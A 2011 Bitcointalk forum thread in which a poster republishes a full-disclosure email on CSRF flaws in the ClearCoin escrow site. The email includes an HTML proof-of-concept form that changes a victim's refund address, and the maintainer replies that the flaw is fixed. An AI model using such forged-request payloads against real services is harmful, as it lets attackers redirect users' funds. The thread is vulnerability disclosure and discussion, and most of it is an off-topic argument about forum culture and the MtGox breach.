>> (p.1)
    Author Topic: [Full Disclosure] ClearCoin CSRFs  (Read 8776 times)

    • jrmithdobbs (OP)
    Newbie
    *
    Offline Offline

    Activity: 67
    Merit: 0


    View Profile
    June 19, 2011, 10:26:45 PM
    Last edit: June 21, 2011, 03:47:00 AM by jrmithdobbs
     #1
    Code:
    From: Doug Huff <dhuff@jrbobdobbs.org>
    Content-Type: multipart/signed; protocol="application/pgp-signature";
    micalg=pgp-sha1; boundary="Apple-Mail-2--499212877"
    X-Smtp-Server: smtp.gmail.com:mith@jrbobdobbs.org
    Subject: Bitcoin fun day!
    Date: Sun, 19 Jun 2011 16:54:28 -0500
    X-Universally-Unique-Identifier: 52968483-4027-4d0b-9145-dc72230ee50c
    Message-Id: <2B2201C1-E59F-47D4-BF67-08FDB0DDE386@jrbobdobbs.org>
    Cc: Bitcoin Dev <bitcoin-development@lists.sourceforge.net>
    To: full-disclosure@lists.grok.org.uk
    Mime-Version: 1.0 (Apple Message framework v1084)
    Content-Transfer-Encoding: 7bit
    X-Pgp-Agent: GPGMail 1.3.3

    This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
    --Apple-Mail-2--499212877
    Content-Type: multipart/signed; boundary=Apple-Mail-1--499212884; protocol="application/pkcs7-signature"; micalg=sha1


    --Apple-Mail-1--499212884
    Content-Transfer-Encoding: quoted-printable
    Content-Type: text/plain;
    charset=us-ascii

    In light of recent events in the "bitcoin community" I have decided that =
    private disclosure of issues is doing nothing but making them more =
    prevalent.

    In light of this decision I would like to report multiple CSRF =
    vulnerabilities in http://clearcoin.appspot.com .

    This set of CSRFs are particularly nasty since this is hosted on appspot =
    and uses google account auth. So long as you stay logged into your =
    google account you are vulnerable to this CSRF.

    Things tested:
      Changing refund address.
      Releasing funds.

    POC code (open this in any browser even from a local file):
    =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
    <html><head><title>test</title></head>
      <body>
      <form id=3D"refund_address_form" =
    action=3D"https://clearcoin.appspot.com/set_refund_address" =
    method=3D"POST">=20
          <label for=3D"refund_address">Your bitcoin address:</label>=20
          <input type=3D"text" name=3D"refund_address" id=3D"refund_address" =
    size=3D"60" value=3D"PUT ANY ADDRESS HERE"
                 class=3D"text ui-widget-content ui-corner-all" autofocus =
    required placeholder=3D"refund bitcoin address"/> (required)
      </form>=20
      </body>
    </html>
    =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

    Javascript auto submittal, hiding in an iframe, and other obfuscation =
    methods are left as an exercise to the list.

    This site is run and maintained by Gavin Anderson, aka, the lead bitcoin =
    maintainer.

    You should know better Gavin.

    --=20
    Douglas Huff



    --Apple-Mail-1--499212884
    Content-Disposition: attachment;
    filename=smime.p7s
    Content-Type: application/pkcs7-signature;
    name=smime.p7s
    Content-Transfer-Encoding: base64

    MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIKXDCCBN0w
    ggPFoAMCAQICEHGS++YZX6xNEoV0cTSiGKcwDQYJKoZIhvcNAQEFBQAwezELMAkGA1UEBhMCR0Ix
    GzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBwwHU2FsZm9yZDEaMBgGA1UECgwR
    Q29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMMGEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczAeFw0w
    NDAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQx
    FzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
    ITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJz
    dC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
    MIIBCgKCAQEAsjmFpPJ9q0E7YkY3rs3BYHW8OWX5ShpHornMSMxqmNVNNRm5pELlzkniii8efNIx
    B8dOtINknS4p1aJkxIW9hVE1eaROaJB7HHqkkqgX8pgV8pPMyaQylbsMTzC9mKALi+VuG6JG+ni8
    om+rWV6lL8/K2m2qL+usobNqqrcuZzWLeeEeaYji5kbNoKXqvgvOdjp6Dpvq/NonWz1zHyLmSGHG
    TPNpsaguG7bUMSAsvIKKjqQOpdeJQ/wWWq8dcdcRWdq6hw2v+vPhwvCkxWeM1tZUOt4KpLoDd7Nl
    yP0e03RiqhjKaJMeoYV+9Udly/hNVyh00jT/MLbu9mIwFIws6wIDAQABo4IBJzCCASMwHwYDVR0j
    BBgwFoAUoBEKIz6W8Qfs4q8p74Klf9AwpLQwHQYDVR0OBBYEFImCZ33EnSZwAEu0UEh83j2uBG59
    MA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr
    BgEFBQcDBDARBgNVHSAECjAIMAYGBFUdIAAwewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5j
    b21vZG9jYS5jb20vQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwu
    Y29tb2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDARBglghkgBhvhCAQEEBAMCAQYw
    DQYJKoZIhvcNAQEFBQADggEBAJ2Vyzy4fqUJxB6/C8LHdo45PJTGEKpPDMngq4RdiVTgZTvzbRx8
    NywlVF+WIfw3hJGdFdwUT4HPVB1rbEVgxy35l1FM+WbKPKCCjKbI8OLp1Er57D9Wyd12jMOCAU9s
    APMeGmF0BEcDqcZAV5G8ZSLFJ2dPV9tkWtmNH7qGL/QGrpxp7en0zykX2OBKnxogL5dMUbtGB8SK
    N04g4wkxaMeexIud6H4RvDJoEJYRmETYKlFgTYjrdDrfQwYyyDlWjDoRUtNBpEMD9O3vMyfbOeAU
    TibJ2PU54om4k123KSZB6rObroP8d3XK6Mq1/uJlSmM+RMTQw16Hc6mYHK9/FX8wggV3MIIEX6AD
    AgECAhEA3puo39RJhNVx/ssfdXafbjANBgkqhkiG9w0BAQUFADCBrjELMAkGA1UEBhMCVVMxCzAJ
    BgNVBAgTAlVUMRcwFQYDVQQHEw5TYWx0IExha2UgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVT
    VCBOZXR3b3JrMSEwHwYDVQQLExhodHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xNjA0BgNVBAMTLVVU
    Ti1VU0VSRmlyc3QtQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBFbWFpbDAeFw0xMTA1MDEwMDAw
    MDBaFw0xMjA0MzAyMzU5NTlaMCUxIzAhBgkqhkiG9w0BCQEWFGRodWZmQGpyYm9iZG9iYnMub3Jn
    MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3ZPhVmPPoaj999EiZAp6e/giHUrh0Pq2
    /LjCFtVgP7clqtoStYyz7i9LojgmRqKu6cswpltUICp+rRskK6ISYRYkNf9w587D2xtqHVVjmoH8
    afW/B0db4v+wC7wjzh+hFlXZ3q7sZApMqsFgAS3mdF+iEe5nNt9kGD7OhNlVimvNqcpIhJhRBhpW
    7vi7/Rt8uVciDOYVARJq7Tb1zZe88wTFkVri075/nFYfikCgU3GccxvcnR9QwC7xoyGFtE/z8qjv
    1h1Tn+eS7eEYQveQxMFNnEPHfoihpiSQpQUzEAJK96dwj8ED2CXtNpV6pQ9PCu2HWjXIVpZj+YNN
    eOSRbwIDAQABo4ICFjCCAhIwHwYDVR0jBBgwFoAUiYJnfcSdJnAAS7RQSHzePa4Ebn0wHQYDVR0O
    BBYEFGBmA3ruGdgBmCodBzi9QrRBvjz/MA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMCAG
    A1UdJQQZMBcGCCsGAQUFBwMEBgsrBgEEAbIxAQMFAjARBglghkgBhvhCAQEEBAMCBSAwRgYDVR0g
    BD8wPTA7BgwrBgEEAbIxAQIBAQEwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2Rv
    Lm5ldC9DUFMwgaUGA1UdHwSBnTCBmjBMoEqgSIZGaHR0cDovL2NybC5jb21vZG9jYS5jb20vVVRO
    LVVTRVJGaXJzdC1DbGllbnRBdXRoZW50aWNhdGlvbmFuZEVtYWlsLmNybDBKoEigRoZEaHR0cDov
    L2NybC5jb21vZG8ubmV0L1VUTi1VU0VSRmlyc3QtQ2xpZW50QXV0aGVudGljYXRpb25hbmRFbWFp
    bC5jcmwwbAYIKwYBBQUHAQEEYDBeMDYGCCsGAQUFBzAChipodHRwOi8vY3J0LmNvbW9kb2NhLmNv
    bS9VVE5BQUFDbGllbnRDQS5jcnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNv
    bTAfBgNVHREEGDAWgRRkaHVmZkBqcmJvYmRvYmJzLm9yZzANBgkqhkiG9w0BAQUFAAOCAQEAj/Ck
    hfsc3p7aoCSIMGOTVBzBjJBtCwWTUF1d/pnJ7ynWCiEOypIGGe0im5+Y1WH8+fVNgIwlifRSoZ1R
    oloxXRuqiraKCevG5OC41Evkp67HmrrhlerLxUvoKLg7sDWfYtmQ24whfYEsd3Fm2u6KxoXboyyb
    fdDhl5BLhWy+5kHHlIaoZjUoHHXOMuOZdhreIcJI54+wehddzwtdrhF0h2KUTm3tvA0e2kTX4Kzz
    3JWIzFSsCmTdTx2UdiOBJmWZ8dgdskOSKRYByvSBT+/BsbF+JbJcjCHqDiEmmXQeTNuRDYeCPfkq
    /HRSrEZMi/RORls1HSA79IOXjvj8RkAKyDGCA/8wggP7AgEBMIHEMIGuMQswCQYDVQQGEwJVUzEL
    MAkGA1UECBMCVVQxFzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRS
    VVNUIE5ldHdvcmsxITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMt
    VVROLVVTRVJGaXJzdC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx
    /ssfdXafbjAJBgUrDgMCGgUAoIICDzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
    DQEJBTEPFw0xMTA2MTkyMTU0MjlaMCMGCSqGSIb3DQEJBDEWBBRTgeJlgs0yICFYnbqMVlsvFVdx
    jTCB1QYJKwYBBAGCNxAEMYHHMIHEMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAVBgNV
    BAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAfBgNV
    BAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1DbGll
    bnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx/ssfdXafbjCB1wYLKoZIhvcN
    AQkQAgsxgceggcQwga4xCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJVVDEXMBUGA1UEBxMOU2FsdCBM
    YWtlIENpdHkxHjAcBgNVBAoTFVRoZSBVU0VSVFJVU1QgTmV0d29yazEhMB8GA1UECxMYaHR0cDov
    L3d3dy51c2VydHJ1c3QuY29tMTYwNAYDVQQDEy1VVE4tVVNFUkZpcnN0LUNsaWVudCBBdXRoZW50
    aWNhdGlvbiBhbmQgRW1haWwCEQDem6jf1EmE1XH+yx91dp9uMA0GCSqGSIb3DQEBAQUABIIBAIa0
    nEwugdoy0co/xZSmSF2FL3Q2I1QjrcwOP2svW7D6yUXl2e9xZdvxPehdGg51UJGtGDDzc5vnT5DW
    HWpskxWyBbwYHEM4g+Tuix0pCey7twTJ51tv4uCZljUzfNc1IrctezhdNmFJQfKIrN+Yq6b81Qnt
    zmK0pq+va+WVMBez9CnojZaijViQD8agyCWouZhQRPwFE7iTaARwtcuoHpN34TqvNfGpeSOAwi13
    6LpFDlN9zzyVeRLgwqbiRQnd2KCzv7yWI+OlzK4bgVB5TPclErhTUvb+rAtAlZM7cDf5uFzsMk1d
    /ui76BOfwXTFRAZsmyKQRjz6NeTNKuOuNtkAAAAAAAA=

    --Apple-Mail-1--499212884--

    --Apple-Mail-2--499212877
    content-type: application/pgp-signature; x-mac-type=70674453;
    name=PGP.sig
    content-description: This is a digitally signed message part
    content-disposition: inline; filename=PGP.sig
    content-transfer-encoding: 7bit

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
    Comment: GPGTools - http://gpgtools.org

    iQIcBAEBAgAGBQJN/nAVAAoJEEPHkQabDWHPBRUP/RqNgPYEjbzKLNOktnBr1Ec0
    VC1k+z6dFoX8FiH4lciF+CFBPHuQ6fsbR9tbVLFVSWmym1F33KVy/7dzsIWbCfGf
    Q255aHrFQsVFPejxmgzRRLhZ8D19vxp3l69ALMe3QKhVdfdfjykVZwnoeeUx7GnJ
    kcrcM9VWISp+Lr9Yc/HgsnerDPomAYEmiH4ur/CS6vC2PKayVoAbwh4Cr+5UyBUP
    /AdYXCRhF1Mci0K3mg3boG8FQkGn+zJJ7s3TB2FMZvK43lSzS1+f2GTfbBZRPVbq
    1hyijFZJx/4P4fX6kOICudU/5/8i9X0qgRoqenXf7kJVH4+e29JCXJNOMXMMrMZN
    au3H6mq6KvmZKMnxZIs4e8G1NIWzO6oOQD7BhUE8A11IlaiNiUYvT+Z1PrV3lfwP
    PgSUnQo3FmH4dPT+fNydQusN/sLMKdrCzRLUAj6o0ZlAu2nvzHU+spDmDluzwdNo
    QW7BNdgcpEUVozgFx/gxi0eXUjOfxS120uyCwLbEFWbUqwmmpxMlACpliOU439P3
    p4uXpISVIOLmRY2pL2mFx9PEzAc5z4Q4+g+HTZtp9cy5fJ7htZSKItuSbciLNlcS
    htX8F/g+Ap0W9Lnd+nnVXxZ8YxOufBvfptU9TSIaVq7uhIphluFiF+nMwqjg4PWE
    BNbnmnNAmUKC7+bLjSzx
    =e0ef
    -----END PGP SIGNATURE-----


    http://sourceforge.net/mailarchive/forum.php?thread_name=2B2201C1-E59F-47D4-BF67-08FDB0DDE386%40jrbobdobbs.org&forum_name=bitcoin-development

    Sorry Gavin.

    (Gavin has already pulled clearcoin offline to address the issue.)

    Edit: Adding f-d link for posterity.
    http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081574.html

  • Durr
    Newbie
    *
    Offline Offline

    Activity: 28
    Merit: 0


    View Profile
    June 19, 2011, 10:33:25 PM
     #2
    Who trusts Gavin anyway?

  • Gavin Andresen
    Legendary
    *
    Offline Offline

    Activity: 1652
    Merit: 2401


    Chief Scientist


    View Profile WWW
    June 19, 2011, 10:36:13 PM
     #3
    Yes, don't trust me, please.  I am human and will make mistakes.

    The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.
    How often do you get the chance to work on a potentially world-changing project?

  • Andrew Vorobyov
    Hero Member
    *****
    Offline Offline

    Activity: 558
    Merit: 500



    View Profile
    June 19, 2011, 10:40:52 PM
     #4
    You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++ Smiley

  • jrmithdobbs (OP)
    Newbie
    *
    Offline Offline

    Activity: 67
    Merit: 0


    View Profile
    June 19, 2011, 10:43:15 PM
     #5
    Quote from: Gavin Andresen on June 19, 2011, 10:36:13 PM
    Yes, don't trust me, please.  I am human and will make mistakes.

    The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.


    Thank you for your timely response and correction of the issue.

  • done
    Newbie
    *
    Offline Offline

    Activity: 56
    Merit: 0


    View Profile
    June 20, 2011, 12:05:34 AM
     #6
    Great job guys

  • gigitrix
    Hero Member
    *****
    Offline Offline

    Activity: 630
    Merit: 500



    View Profile
    June 20, 2011, 12:55:25 AM
     #7
    Quote from: Andrew Vorobyov on June 19, 2011, 10:40:52 PM
    You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++ Smiley

    Hahah, never has a truer word been spoken!

  • Batouzo
    Member
    **
    Offline Offline

    Activity: 70
    Merit: 10


    View Profile
    June 20, 2011, 12:56:32 AM
     #8
    Quote from: Durr on June 19, 2011, 10:33:25 PM
    Who trusts Gavin anyway?

    Well... the FBI?  (conference) Wink

  • unk
    Member
    **
    Offline Offline

    Activity: 84
    Merit: 10


    View Profile
    June 20, 2011, 01:03:32 AM
     #9
    this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

    this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

  • NghtRppr
    Sr. Member
    ****
    Offline Offline

    Activity: 504
    Merit: 252


    Elder Crypto God


    View Profile WWW
    June 20, 2011, 01:16:32 AM
     #10
    Quote from: unk on June 20, 2011, 01:03:32 AM
    this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

    this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from a more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

    I take offense to lumping all of us libertarians together as if we are the problem. Please look over my post history and you will see that I simply don't engage in personal attacks or abusive behavior in general, even when viciously insulted. The people that are decrying anything that could devalue BTC are the people that are just into Bitcoin to make a few quick bucks. I'm in it for the long haul because I value economic freedom as a libertarian. I'd rather see the currency stabilize than make money. I have a source of income. I don't need to speculate. I also welcome disclosure of vulnerabilities because it puts pressure on administrators to fix the problem as well as notifies the community that they should think twice about trusting the keys to the kingdom without considering risk. Please rethink your opinion on libertarians because even when the speculators are long gone, we will still be here wanting to use this currency.

  • iCEBREAKER
    Legendary
    *
    Offline Offline

    Activity: 2156
    Merit: 1072


    Crypto is the separation of Power and State.


    View Profile WWW
    June 20, 2011, 02:09:52 AM
     #11
    Quote from: unk on June 20, 2011, 01:03:32 AM
    this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

    this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

    I, too, Blame Ayn Rand for all evil in the world and especially on this forum.

    /s

    That's actually more lulzy than petulant. 

    I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever. 

    And not using the same l/p.  And due diligence.

    ██████████
    █████████████████
    ██████████████████████
    █████████████████████████
    ████████████████████████████
    ████    ████████████████████████
    █████    ███████████████████████████
    █████    ███████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ███████████████████████████
    ██████    ██████████████████████████
    █████    ███████████████████████████
    █████████████
    ██████████████
    ████████████████████████████
    █████████████████████████
    ██████████████████████
    █████████████████
    ██████████
    Monero
    "The difference between bad and well-developed digital cash will determine
    whether we have a dictatorship or a real democracy."      David Chaum 1996
    "Fungibility provides privacy as a side effect."  Adam Back 2014
    Buy and sell XMR near you
    P2P Exchange Network
    Buy XMR with fiat
    Is Dash a scam?

  • TriumVir
    Newbie
    *
    Offline Offline

    Activity: 56
    Merit: 0


    View Profile
    June 20, 2011, 02:22:07 AM
     #12
    Amateur hour all the way around.

  • unk
    Member
    **
    Offline Offline

    Activity: 84
    Merit: 10


    View Profile
    June 20, 2011, 02:36:43 AM
     #13
    Quote from: iCEBREAKER on June 20, 2011, 02:09:52 AM
    I, too, Blame Ayn Rand for all evil in the world and especially on this forum.

    'for some ridiculous and extreme attitudes among teenagers' is not the same thing as 'all the evil in the world'. but bitcoin2cash is right. i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.

    Quote
    I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever. 

    these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.

  • iCEBREAKER
    Legendary
    *
    Offline Offline

    Activity: 2156
    Merit: 1072


    Crypto is the separation of Power and State.


    View Profile WWW
    June 20, 2011, 04:04:09 AM
     #14
    Quote from: unk on June 20, 2011, 02:36:43 AM
    i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.

    Many teens have yet not learned to tolerate the ignorant hypocrisy of those whose knee jerk objections to bitcoin not only are specifically addressed by the design, but obviously apply to the fiat money created by the State.  That's a good thing.  I like people who stand up and vigorously defend their values and beliefs.

    If you, or the other guy who left, can't look past their enthusiasm, vehemence, and zeal that's your problem.

    Even a reasonable adult might get sick having to repeatedly point out that federal reserve notes are way more of a fake Ponzi rip-off scam than any form of cryptocash.


    Quote

    these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.

    Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

    ██████████
    █████████████████
    ██████████████████████
    █████████████████████████
    ████████████████████████████
    ████    ████████████████████████
    █████    ███████████████████████████
    █████    ███████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ███████████████████████████
    ██████    ██████████████████████████
    █████    ███████████████████████████
    █████████████
    ██████████████
    ████████████████████████████
    █████████████████████████
    ██████████████████████
    █████████████████
    ██████████
    Monero
    "The difference between bad and well-developed digital cash will determine
    whether we have a dictatorship or a real democracy."      David Chaum 1996
    "Fungibility provides privacy as a side effect."  Adam Back 2014
    Buy and sell XMR near you
    P2P Exchange Network
    Buy XMR with fiat
    Is Dash a scam?

  • unk
    Member
    **
    Offline Offline

    Activity: 84
    Merit: 10


    View Profile
    June 20, 2011, 04:07:18 AM
     #15
    Quote from: iCEBREAKER on June 20, 2011, 04:04:09 AM
    Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

    mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)

  • iCEBREAKER
    Legendary
    *
    Offline Offline

    Activity: 2156
    Merit: 1072


    Crypto is the separation of Power and State.


    View Profile WWW
    June 20, 2011, 04:54:36 AM
     #16
    Quote from: unk on June 20, 2011, 04:07:18 AM
    Quote from: iCEBREAKER on June 20, 2011, 04:04:09 AM
    Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

    mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)

    Nobody is debating whether the XSRF vulnerability existed any longer, as it was demonstrated on Friday night.

    It's been fixed and had nothing to do with the break-in, which was the fault of MtGox's finance auditor AND NOT THE RESULT OF XSRF, SQL, TROJANS, TEMPEST, OR WHATEVER YOUR BUDDY WAS MOANING ABOUT.

    Now the issue is that so many were so quick to point fingers immediately following the MtGox breach, without bothering to confirm or verify anything with the principals involved.

    You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

    Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

    I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

    ██████████
    █████████████████
    ██████████████████████
    █████████████████████████
    ████████████████████████████
    ████    ████████████████████████
    █████    ███████████████████████████
    █████    ███████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ███████████████████████████
    ██████    ██████████████████████████
    █████    ███████████████████████████
    █████████████
    ██████████████
    ████████████████████████████
    █████████████████████████
    ██████████████████████
    █████████████████
    ██████████
    Monero
    "The difference between bad and well-developed digital cash will determine
    whether we have a dictatorship or a real democracy."      David Chaum 1996
    "Fungibility provides privacy as a side effect."  Adam Back 2014
    Buy and sell XMR near you
    P2P Exchange Network
    Buy XMR with fiat
    Is Dash a scam?

  • unk
    Member
    **
    Offline Offline

    Activity: 84
    Merit: 10


    View Profile
    June 20, 2011, 05:00:04 AM
     #17
    Quote from: iCEBREAKER on June 20, 2011, 04:54:36 AM
    You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

    i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken.

    Quote
    Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

    I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

    this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.

  • iCEBREAKER
    Legendary
    *
    Offline Offline

    Activity: 2156
    Merit: 1072


    Crypto is the separation of Power and State.


    View Profile WWW
    June 20, 2011, 05:11:59 AM
     #18
    Quote from: unk on June 20, 2011, 05:00:04 AM
    Quote from: iCEBREAKER on June 20, 2011, 04:54:36 AM
    You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

    i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken.

    Quote
    Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

    I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

    this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.

    It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.

    Your petulant lack of humor is far more childish than my poking fun at the idea of technobabble as a compelling explanation for the MtGox situation.

    Your humorless, grumpy inference regarding my technical understanding of the concepts at hand was not reasonable, especially given my previous posts and demonstrated hash rate.

    ██████████
    █████████████████
    ██████████████████████
    █████████████████████████
    ████████████████████████████
    ████    ████████████████████████
    █████    ███████████████████████████
    █████    ███████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ████████████████████████████
    ██████    ███████████████████████████
    ██████    ██████████████████████████
    █████    ███████████████████████████
    █████████████
    ██████████████
    ████████████████████████████
    █████████████████████████
    ██████████████████████
    █████████████████
    ██████████
    Monero
    "The difference between bad and well-developed digital cash will determine
    whether we have a dictatorship or a real democracy."      David Chaum 1996
    "Fungibility provides privacy as a side effect."  Adam Back 2014
    Buy and sell XMR near you
    P2P Exchange Network
    Buy XMR with fiat
    Is Dash a scam?

  • unk
    Member
    **
    Offline Offline

    Activity: 84
    Merit: 10


    View Profile
    June 20, 2011, 05:21:23 AM
     #19
    Quote from: iCEBREAKER on June 20, 2011, 05:11:59 AM
    It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.

    and where do you think i ever claimed that i knew the cause of the problems on mt. gox? i wasn't even talking about them. note that we're in a discussion about a cross-site forgery problem on clearcoin. i brought up mt. gox only after you called me 'gotcha guy' and seemed to suggest they had never been vulnerable to such request-forgery problems.

    i know this is an internet forum and all, and reading comprehension may not be your strength, but it might be worth actually reading what i'm saying before criticising it, calling me a 'bozo', and referring to my 'e-peen'. grow up, please.

  • jrmithdobbs (OP)
    Newbie
    *
    Offline Offline

    Activity: 67
    Merit: 0


    View Profile
    June 20, 2011, 05:42:16 AM
     #20
    Quote from: iCEBREAKER on June 20, 2011, 05:11:59 AM
